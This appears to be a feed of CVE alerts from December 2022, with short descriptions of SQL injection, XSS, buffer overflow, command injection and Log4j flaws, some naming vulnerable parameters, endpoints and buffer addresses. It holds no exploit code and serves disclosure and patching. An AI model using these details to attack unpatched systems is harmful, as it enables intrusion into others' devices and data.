| 2022-12-12 14:47:24 |
🚨 CVE-2022-46908SQLite through 3.40.0, when relying on --safe for execution of an untrusted CLI script, does not properly implement the azProhibitedFunctions protection mechanism, and instead allows UDF functions such as WRITEFILE.🎖@cveNotify |
|
| 2022-12-12 14:47:22 |
🚨 CVE-2022-4416A vulnerability was found in RainyGao DocSys. It has been declared as critical. This vulnerability affects the function getReposAllUsers of the file /DocSystem/Repos/getReposAllUsers.do. The manipulation of the argument searchWord/reposId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-215278 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-12 11:48:00 |
🚨 CVE-2022-20686Multiple vulnerabilities in the Link Layer Discovery Protocol (LLDP) functionality of Cisco ATA 190 Series Analog Telephone Adapter firmware could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device and cause the LLDP service to restart. These vulnerabilities are due to missing length validation of certain LLDP packet header fields. An attacker could exploit these vulnerabilities by sending a malicious LLDP packet to an affected device. A successful exploit could allow the attacker to execute code on the affected device and cause LLDP to restart unexpectedly, resulting in a denial of service (DoS) condition.🎖@cveNotify |
|
| 2022-12-12 11:47:59 |
🚨 CVE-2022-20687Multiple vulnerabilities in the Link Layer Discovery Protocol (LLDP) functionality of Cisco ATA 190 Series Analog Telephone Adapter firmware could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device and cause the LLDP service to restart. These vulnerabilities are due to missing length validation of certain LLDP packet header fields. An attacker could exploit these vulnerabilities by sending a malicious LLDP packet to an affected device. A successful exploit could allow the attacker to execute code on the affected device and cause LLDP to restart unexpectedly, resulting in a denial of service (DoS) condition.🎖@cveNotify |
|
| 2022-12-12 11:47:58 |
🚨 CVE-2022-20688A vulnerability in the Cisco Discovery Protocol functionality of Cisco ATA 190 Series Analog Telephone Adapter firmware could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device and cause Cisco Discovery Protocol service to restart. This vulnerability is due to missing length validation of certain Cisco Discovery Protocol packet header fields. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to execute code on the affected device and cause Cisco Discovery Protocol to restart unexpectedly, resulting in a DoS condition.🎖@cveNotify |
|
| 2022-12-12 11:47:57 |
🚨 CVE-2022-20689Multiple vulnerabilities in the Cisco Discovery Protocol functionality of Cisco ATA 190 Series Analog Telephone Adapter firmware could allow an unauthenticated, adjacent attacker to cause Cisco Discovery Protocol memory corruption on an affected device. These vulnerabilities are due to missing length validation checks when processing Cisco Discovery Protocol messages. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to cause an out-of-bounds read of the valid Cisco Discovery Protocol packet data, which could allow the attacker to cause corruption in the internal Cisco Discovery Protocol database of the affected device.🎖@cveNotify |
|
| 2022-12-12 11:47:56 |
🚨 CVE-2022-20690Multiple vulnerabilities in the Cisco Discovery Protocol functionality of Cisco ATA 190 Series Analog Telephone Adapter firmware could allow an unauthenticated, adjacent attacker to cause Cisco Discovery Protocol memory corruption on an affected device. These vulnerabilities are due to missing length validation checks when processing Cisco Discovery Protocol messages. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to cause an out-of-bounds read of the valid Cisco Discovery Protocol packet data, which could allow the attacker to cause corruption in the internal Cisco Discovery Protocol database of the affected device.🎖@cveNotify |
|
| 2022-12-12 11:47:52 |
🚨 CVE-2022-20691A vulnerability in the Cisco Discovery Protocol functionality of Cisco ATA 190 Series Adaptive Telephone Adapter firmware could allow an unauthenticated, adjacent attacker to cause a DoS condition of an affected device. This vulnerability is due to missing length validation of certain Cisco Discovery Protocol packet header fields. An attacker could exploit this vulnerability by sending crafted Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the device to exhaust available memory and cause the service to restart. Cisco has released firmware updates that address this vulnerability.🎖@cveNotify |
|
| 2022-12-12 11:47:51 |
🚨 CVE-2022-20968A vulnerability in the Cisco Discovery Protocol processing feature of Cisco IP Phone 7800 and 8800 Series firmware could allow an unauthenticated, adjacent attacker to cause a stack overflow on an affected device. This vulnerability is due to insufficient input validation of received Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending crafted Cisco Discovery Protocol traffic to an affected device. A successful exploit could allow the attacker to cause a stack overflow, resulting in possible remote code execution or a denial of service (DoS) condition on an affected device.🎖@cveNotify |
|
| 2022-12-12 11:47:50 |
🚨 CVE-2022-3641Elevation of privilege in the Azure SQL Data Source in Devolutions Remote Desktop Manager 2022.3.13 to 2022.3.24 allows an authenticated user to spoof a privileged account.🎖@cveNotify |
|
| 2022-12-12 11:47:49 |
🚨 CVE-2022-41296IBM Db2U 3.5, 4.0, and 4.5 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 237210.🎖@cveNotify |
|
| 2022-12-12 11:47:48 |
🚨 CVE-2022-45797An arbitrary file deletion vulnerability in the Damage Cleanup Engine component of Trend Micro Apex One and Trend Micro Apex One as a Service could allow a local attacker to escalate privileges and delete files on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2022-12-12 11:47:47 |
🚨 CVE-2022-46682Jenkins Plot Plugin 2.1.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2022-12-12 11:47:46 |
🚨 CVE-2022-46683Jenkins Google Login Plugin 1.4 through 1.6 (both inclusive) improperly determines that a redirect URL after login is legitimately pointing to Jenkins.🎖@cveNotify |
|
| 2022-12-12 11:47:45 |
🚨 CVE-2022-46684Jenkins Checkmarx Plugin 2022.3.3 and earlier does not escape values returned from the Checkmarx service API before inserting them into HTML reports, resulting in a stored cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2022-12-12 11:47:44 |
🚨 CVE-2022-46685In Jenkins Gitea Plugin 1.4.4 and earlier, the implementation of Gitea personal access tokens did not support credentials masking, potentially exposing them through the build log.🎖@cveNotify |
|
| 2022-12-12 11:47:43 |
🚨 CVE-2022-46686Jenkins Custom Build Properties Plugin 2.79.vc095ccc85094 and earlier does not escape property values and build display names on the Custom Build Properties and Build Summary pages, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to set or change these values.🎖@cveNotify |
|
| 2022-12-12 11:47:42 |
🚨 CVE-2022-46687Jenkins Spring Config Plugin 2.0.0 and earlier does not escape build display names shown on the Spring Config view, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to change build display names.🎖@cveNotify |
|
| 2022-12-12 11:47:41 |
🚨 CVE-2022-46688A cross-site request forgery (CSRF) vulnerability in Jenkins Sonar Gerrit Plugin 377.v8f3808963dc5 and earlier allows attackers to have Jenkins connect to Gerrit servers (previously configured by Jenkins administrators) using attacker-specified credentials IDs obtained through another method, potentially capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2022-12-12 11:47:40 |
🚨 CVE-2022-4416A vulnerability was found in RainyGao DocSys. It has been declared as critical. This vulnerability affects the function getReposAllUsers of the file /DocSystem/Repos/getReposAllUsers.do. The manipulation of the argument searchWord/reposId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-215278 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-12 11:47:39 |
🚨 CVE-2022-46908SQLite through 3.40.0, when relying on --safe for execution of an untrusted CLI script, does not properly implement the azProhibitedFunctions protection mechanism, and instead allows UDF functions such as WRITEFILE.🎖@cveNotify |
|
| 2022-12-12 11:47:38 |
🚨 CVE-2022-31596Under certain conditions, an attacker authenticated as a CMS administrator and with high privileges access to the Network in SAP BusinessObjects Business Intelligence Platform (Monitoring DB) - version 430, can access BOE Monitoring database to retrieve and modify (non-personal) system data which would otherwise be restricted. Also, a potential attack could be used to leave the CMS's scope and impact the database. A successful attack could have a low impact on confidentiality, a high impact on integrity, and a low impact on availability.🎖@cveNotify |
|
| 2022-12-12 07:47:46 |
🚨 CVE-2021-3941In ImfChromaticities.cpp routine RGBtoXYZ(), there are some division operations such as `float Z = (1 - chroma.white.x - chroma.white.y) * Y / chroma.white.y;` and `chroma.green.y * (X + Z))) / d;` but the divisor is not checked for a 0 value. A specially crafted file could trigger a divide-by-zero condition which could affect the availability of programs linked with OpenEXR.🎖@cveNotify |
|
| 2022-12-12 07:47:42 |
🚨 CVE-2021-20302A flaw was found in OpenEXR's TiledInputFile functionality. This flaw allows an attacker who can submit a crafted single-part non-image to be processed by OpenEXR, to trigger a floating-point exception error. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2022-12-12 07:47:41 |
🚨 CVE-2021-20303A flaw found in function dataWindowForTile() of IlmImf/ImfTiledMisc.cpp. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger an integer overflow, leading to an out-of-bounds write on the heap. The greatest impact of this flaw is to application availability, with some potential impact to data integrity as well.🎖@cveNotify |
|
| 2022-12-12 07:47:40 |
🚨 CVE-2021-3605There's a flaw in OpenEXR's rleUncompress functionality in versions prior to 3.0.5. An attacker who is able to submit a crafted file to an application linked with OpenEXR could cause an out-of-bounds read. The greatest risk from this flaw is to application availability.🎖@cveNotify |
|
| 2022-12-12 07:47:36 |
🚨 CVE-2021-3598There's a flaw in OpenEXR's ImfDeepScanLineInputFile functionality in versions prior to 3.0.5. An attacker who is able to submit a crafted file to an application linked with OpenEXR could cause an out-of-bounds read. The greatest risk from this flaw is to application availability.🎖@cveNotify |
|
| 2022-12-12 07:47:35 |
🚨 CVE-2021-26260An integer overflow leading to a heap-buffer overflow was found in the DwaCompressor of OpenEXR in versions before 3.0.1. An attacker could use this flaw to crash an application compiled with OpenEXR. This is a different flaw from CVE-2021-23215.🎖@cveNotify |
|
| 2022-12-12 07:47:34 |
🚨 CVE-2021-20296A flaw was found in OpenEXR in versions before 3.0.0-beta. A crafted input file supplied by an attacker, that is processed by the Dwa decompression functionality of OpenEXR's IlmImf library, could cause a NULL pointer dereference. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2022-12-12 07:47:33 |
🚨 CVE-2021-3479There's a flaw in OpenEXR's Scanline API functionality in versions before 3.0.0-beta. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger excessive consumption of memory, resulting in an impact to system availability.🎖@cveNotify |
|
| 2022-12-12 07:47:30 |
🚨 CVE-2021-3478There's a flaw in OpenEXR's scanline input file functionality in versions before 3.0.0-beta. An attacker able to submit a crafted file to be processed by OpenEXR could consume excessive system memory. The greatest impact of this flaw is to system availability.🎖@cveNotify |
|
| 2022-12-12 07:47:29 |
🚨 CVE-2021-3477There's a flaw in OpenEXR's deep tile sample size calculations in versions before 3.0.0-beta. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger an integer overflow, subsequently leading to an out-of-bounds read. The greatest risk of this flaw is to application availability.🎖@cveNotify |
|
| 2022-12-12 07:47:28 |
🚨 CVE-2021-3475There is a flaw in OpenEXR in versions before 3.0.0-beta. An attacker who can submit a crafted file to be processed by OpenEXR could cause an integer overflow, potentially leading to problems with application availability.🎖@cveNotify |
|
| 2022-12-12 07:47:27 |
🚨 CVE-2021-3474There's a flaw in OpenEXR in versions before 3.0.0-beta. A crafted input file that is processed by OpenEXR could cause a shift overflow in the FastHufDecoder, potentially leading to problems with application availability.🎖@cveNotify |
|
| 2022-12-12 02:47:29 |
🚨 CVE-2022-4403A vulnerability classified as critical was found in SourceCodester Canteen Management System. This vulnerability affects unknown code of the file ajax_represent.php. The manipulation of the argument customer_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215272.🎖@cveNotify |
|
| 2022-12-12 02:47:25 |
🚨 CVE-2022-4407Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.1.9.🎖@cveNotify |
|
| 2022-12-12 02:47:24 |
🚨 CVE-2022-4401A vulnerability was found in pallidlight online-course-selection-system. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-215268.🎖@cveNotify |
|
| 2022-12-12 02:47:23 |
🚨 CVE-2022-4402A vulnerability classified as critical has been found in RainyGao DocSys 2.02.37. This affects an unknown part of the component ZIP File Decompression Handler. The manipulation leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215271.🎖@cveNotify |
|
| 2022-12-11 17:47:25 |
🚨 CVE-2022-4403A vulnerability classified as critical was found in SourceCodester Canteen Management System. This vulnerability affects unknown code of the file ajax_represent.php. The manipulation of the argument customer_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215272.🎖@cveNotify |
|
| 2022-12-11 17:47:24 |
🚨 CVE-2022-4408Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.9.🎖@cveNotify |
|
| 2022-12-11 17:47:23 |
🚨 CVE-2022-4409Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository thorsten/phpmyfaq prior to 3.1.9.🎖@cveNotify |
|
| 2022-12-11 12:47:25 |
🚨 CVE-2022-4400A vulnerability was found in zbl1996 FS-Blog and classified as problematic. This issue affects some unknown processing of the component Title Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-215267.🎖@cveNotify |
|
| 2022-12-11 12:47:24 |
🚨 CVE-2022-4401A vulnerability was found in pallidlight online-course-selection-system. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-215268.🎖@cveNotify |
|
| 2022-12-11 12:47:23 |
🚨 CVE-2022-4402A vulnerability classified as critical has been found in RainyGao DocSys 2.02.37. This affects an unknown part of the component ZIP File Decompression Handler. The manipulation leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215271.🎖@cveNotify |
|
| 2022-12-11 00:47:28 |
🚨 CVE-2022-4399A vulnerability was found in TicklishHoneyBee nodau. It has been rated as critical. Affected by this issue is some unknown functionality of the file src/db.c. The manipulation of the argument value/name leads to sql injection. The name of the patch is 7a7d737a3929f335b9717ddbd31db91151b69ad2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215252.🎖@cveNotify |
|
| 2022-12-10 19:47:23 |
🚨 CVE-2022-41853Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled.🎖@cveNotify |
|
| 2022-12-10 18:47:33 |
🚨 CVE-2022-45145egg-compile.scm in CHICKEN 5.x before 5.3.1 allows arbitrary OS command execution during package installation via escape characters in a .egg file.🎖@cveNotify |
|
| 2022-12-10 13:47:23 |
🚨 CVE-2022-4396** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in RDFlib pyrdfa3 and classified as problematic. This issue affects the function _get_option of the file pyRdfa/__init__.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ffd1d62dd50d5f4190013b39cedcdfbd81f3ce3e. It is recommended to apply a patch to fix this issue. The identifier VDB-215249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2022-12-10 12:47:24 |
🚨 CVE-2022-0730Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types.🎖@cveNotify |
|
| 2022-12-10 01:47:39 |
🚨 CVE-2022-23497FreshRSS is a free, self-hostable RSS aggregator. User configuration files can be accessed by a remote user. In addition to user preferences, such configurations contain hashed passwords (brypt with cost 9, salted) of FreshRSS Web interface. If the API is used, the configuration might contain a hashed password (brypt with cost 9, salted) of the GReader API, and a hashed password (MD5 salted) of the Fever API. Users should update to version 1.20.2 or edge. Users unable to upgrade can apply the patch manually or delete the file `./FreshRSS/p/ext.php`.🎖@cveNotify |
|
| 2022-12-10 01:47:38 |
🚨 CVE-2022-23510cube-js is a headless business intelligence platform. In version 0.31.23 all authenticated Cube clients could bypass SQL row-level security and run arbitrary SQL via the newly introduced /v1/sql-runner endpoint. This issue has been resolved in version 0.31.24. Users are advised to either upgrade to 0.31.24 or to downgrade to 0.31.22. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2022-12-10 00:47:24 |
🚨 CVE-2022-46166Spring boot admins is an open source administrative user interface for management of spring boot applications. All users who run Spring Boot Admin Server, having enabled Notifiers (e.g. Teams-Notifier) and write access to environment variables via UI are affected. Users are advised to upgrade to the most recent releases of Spring Boot Admin 2.6.10 and 2.7.8 to resolve this issue. Users unable to upgrade may disable any notifier or disable write access (POST request) on `/env` actuator endpoint.🎖@cveNotify |
|
| 2022-12-10 00:47:23 |
🚨 CVE-2022-43464Hidden functionality vulnerability in UDR-JA1604/UDR-JA1608/UDR-JA1616 firmware versions 71x10.1.107112.43A and earlier allows a remote authenticated attacker to execute an arbitrary OS command on the device or alter the device settings.🎖@cveNotify |
|
| 2022-12-09 17:48:02 |
🚨 CVE-2021-44227In GNU Mailman before 2.1.38, a list member or moderator can get a CSRF token and craft an admin request (using that token) to set a new admin password or make other changes.🎖@cveNotify |
|
| 2022-12-09 15:47:40 |
🚨 CVE-2022-4377A vulnerability was found in S-CMS 5.0 Build 20220328. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Contact Information Page. The manipulation of the argument Make a Call leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-215197 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-09 15:47:39 |
🚨 CVE-2022-41947DHIS 2 is an open source information system for data capture, management, validation, analytics and visualization. Through various features of DHIS2, an authenticated user may be able to upload a file which includes embedded javascript. The user could then potentially trick another authenticated user to open the malicious file in a browser which would trigger the javascript code, resulting in a cross-site scripting (XSS) attack. DHIS2 administrators should upgrade to the following hotfix releases: 2.36.12.1, 2.37.8.1, 2.38.2.1, 2.39.0.1. Users unable to upgrade may add the following simple CSP rule in your web proxy to the vulnerable endpoints: `script-src 'none'`. This workaround will prevent all javascript from running on those endpoints.🎖@cveNotify |
|
| 2022-12-09 15:47:38 |
🚨 CVE-2022-41948DHIS 2 is an open source information system for data capture, management, validation, analytics and visualization. Affected versions are subject to a privilege escalation vulnerability. A DHIS2 user with authority to manage users can assign superuser privileges to themself by manually crafting an HTTP PUT request. Only users with the following DHIS2 user role authorities can exploit this vulnerability. Note that in many systems the only users with user admin privileges are also superusers. In these cases, the escalation vulnerability does not exist. The vulnerability is only exploitable by attackers who can authenticate as users with the user admin authority. As this is usually a small and relatively trusted set of users, exploit vectors will often be limited. DHIS2 administrators should upgrade to the following hotfix releases: 2.36.12.1, 2.37.8.1, 2.38.2.1, 2.39.0.1. The only known workaround to this issue is to avoid the assignment of the user management authority to any users until the patch has been applied.🎖@cveNotify |
|
| 2022-12-09 15:47:35 |
🚨 CVE-2022-38765Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.🎖@cveNotify |
|
| 2022-12-09 15:47:34 |
🚨 CVE-2022-23466teler is an real-time intrusion detection and threat alert dashboard. teler prior to version 2.0.0-rc.4 is vulnerable to DOM-based cross-site scripting (XSS) in the teler dashboard. When teler requests messages from the event stream on the `/events` endpoint, the log data displayed on the dashboard are not sanitized. This only affects authenticated users and can only be exploited based on detected threats if the log contains a DOM scripting payload. This vulnerability has been fixed on version `v2.0.0-rc.4`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2022-12-09 15:47:33 |
🚨 CVE-2017-16347An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01e7d4 the value for the s_vol key is copied using strcpy to the buffer at 0xa0001700. This buffer is maximum 12 bytes large (this is the maximum size it could be, it is possible other global variables are stored between this variable and the next one that we could identify), sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2022-12-09 15:47:29 |
🚨 CVE-2017-16340An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01c0e8 the value for the s_dport key is copied using strcpy to the buffer at 0xa000180c. This buffer is 6 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2022-12-09 15:47:28 |
🚨 CVE-2022-45519Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the Go parameter at /goform/SafeMacFilter.🎖@cveNotify |
|
| 2022-12-09 15:47:24 |
🚨 CVE-2022-45520Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the page parameter at /goform/qossetting.🎖@cveNotify |
|
| 2022-12-09 15:47:23 |
🚨 CVE-2022-45517Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the page parameter at /goform/VirtualSer.🎖@cveNotify |
|
| 2022-12-09 15:47:22 |
🚨 CVE-2022-45521Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the page parameter at /goform/SafeUrlFilter.🎖@cveNotify |
|
| 2022-12-09 14:47:28 |
🚨 CVE-2022-45499Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/WifiMacFilterGet.🎖@cveNotify |
|
| 2022-12-09 14:47:27 |
🚨 CVE-2022-41735IBM Business Process Manager 21.0.1 through 21.0.3.1, 20.0.0.1 through 20.0.0.2 19.0.0.1 through 19.0.0.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 65687.🎖@cveNotify |
|
| 2022-12-09 11:47:28 |
🚨 CVE-2022-4375A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.🎖@cveNotify |
|
| 2022-12-09 11:47:27 |
🚨 CVE-2022-4377A vulnerability was found in S-CMS 5.0 Build 20220328. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Contact Information Page. The manipulation of the argument Make a Call leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-215197 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-09 07:47:50 |
🚨 CVE-2021-44731A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence gain privilege escalation. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1🎖@cveNotify |
|
| 2022-12-09 07:47:47 |
🚨 CVE-2021-44228Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.🎖@cveNotify |
|
| 2022-12-09 07:47:45 |
🚨 CVE-2021-33621The cgi gem before 0.1.0.2, 0.2.x before 0.2.2, and 0.3.x before 0.3.5 for Ruby allows HTTP response splitting. This is relevant to applications that use untrusted user input either to generate an HTTP response or to create a CGI::Cookie object.🎖@cveNotify |
|
| 2022-12-09 07:47:43 |
🚨 CVE-2022-45061An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.🎖@cveNotify |
|
| 2022-12-09 07:47:39 |
🚨 CVE-2017-14474In the MMM::Agent::Helpers::_execute function in MySQL Multi-Master Replication Manager (MMM) mmm_agentd 2.2.1, a specially crafted MMM protocol message can cause a shell command injection resulting in arbitrary command execution with the privileges of the mmm\_agentd process. An attacker that can initiate a TCP session with mmm\_agentd can trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-09 07:47:38 |
🚨 CVE-2017-14477In the MMM::Agent::Helpers::Network::add_ip function in MySQL Multi-Master Replication Manager (MMM) mmm_agentd 2.2.1 (for FreeBSD), a specially crafted MMM protocol message can cause a shell command injection resulting in arbitrary command execution with the privileges of the mmm\_agentd process. An attacker that can initiate a TCP session with mmm\_agentd can trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-09 07:47:37 |
🚨 CVE-2017-14478In the MMM::Agent::Helpers::Network::clear_ip function in MySQL Multi-Master Replication Manager (MMM) mmm_agentd 2.2.1 (for Linux), a specially crafted MMM protocol message can cause a shell command injection resulting in arbitrary command execution with the privileges of the mmm\_agentd process. An attacker that can initiate a TCP session with mmm\_agentd can trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-09 07:47:34 |
🚨 CVE-2017-14479In the MMM::Agent::Helpers::Network::clear_ip function in MySQL Multi-Master Replication Manager (MMM) mmm_agentd 2.2.1 (for Solaris), a specially crafted MMM protocol message can cause a shell command injection resulting in arbitrary command execution with the privileges of the mmm\_agentd process. An attacker that can initiate a TCP session with mmm\_agentd can trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-09 07:47:33 |
🚨 CVE-2017-16252Specially crafted commands sent through the PubNub service in Insteon Hub 2245-222 with firmware version 1012 can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability.At 0x9d014cc0 the value for the cmd key is copied using strcpy to the buffer at $sp+0x11c. This buffer is 20 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2022-12-09 07:47:32 |
🚨 CVE-2017-16254An exploitable buffer overflow vulnerability exists in the PubNub message handler Insteon Hub 2245-222 - Firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker can send an authenticated HTTP request at 0x9d014e4c the value for the flg key is copied using strcpy to the buffer at $sp+0x270. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2022-12-09 07:47:28 |
🚨 CVE-2017-16337On Insteon Hub 2245-222 devices with firmware version 1012, specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. At 0x9d01ef24 the value for the s_offset key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2022-12-09 07:47:27 |
🚨 CVE-2017-16341An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01c224 the value for the s_vol_play key is copied using strcpy to the buffer at 0xa0000418. This buffer is maximum 8 bytes large (this is the maximum size it could be, it is possible other global variables are stored between this variable and the next one that we could identify), sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2022-12-09 02:49:36 |
🚨 CVE-2022-4322A vulnerability, which was classified as critical, was found in maku-boot up to 2.2.0. This affects the function doExecute of the file AbstractScheduleJob.java of the component Scheduled Task Handler. The manipulation leads to injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 446eb7294332efca2bfd791bc37281cedac0d0ff. It is recommended to apply a patch to fix this issue. The identifier VDB-215013 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-09 02:49:35 |
🚨 CVE-2019-18265Digital Alert Systems’ DASDEC software prior to version 4.1 contains a cross-site scripting (XSS) vulnerability that allows remote attackers to inject arbitrary web script or HTML via the SSH username, username field of the login page, or via the HTTP host header. The injected content is stored in logs and rendered when viewed in the web application.🎖@cveNotify |
|
| 2022-12-09 02:49:34 |
🚨 CVE-2022-40204A cross-site scripting (XSS) vulnerability exists in all current versions of Digital Alert Systems DASDEC software via the Host Header in undisclosed pages after login.🎖@cveNotify |
|
| 2022-12-09 02:49:30 |
🚨 CVE-2022-35258An unauthenticated attacker can cause a denial-of-service to the following products: Ivanti Connect Secure (ICS) in versions prior to 9.1R14.3, 9.1R15.2, 9.1R16.2, and 22.2R4, Ivanti Policy Secure (IPS) in versions prior to 9.1R17 and 22.3R1, and Ivanti Neurons for Zero-Trust Access in versions prior to 22.3R1.🎖@cveNotify |
|
| 2022-12-09 02:49:29 |
🚨 CVE-2022-43557The BD BodyGuard™ infusion pumps specified allow for access through the RS-232 (serial) port interface. If exploited, threat actors with physical access, specialized equipment and knowledge may be able to configure or disable the pump. No electronic protected health information (ePHI), protected health information (PHI) or personally identifiable information (PII) is stored in the pump.🎖@cveNotify |
|
| 2022-12-09 02:49:28 |
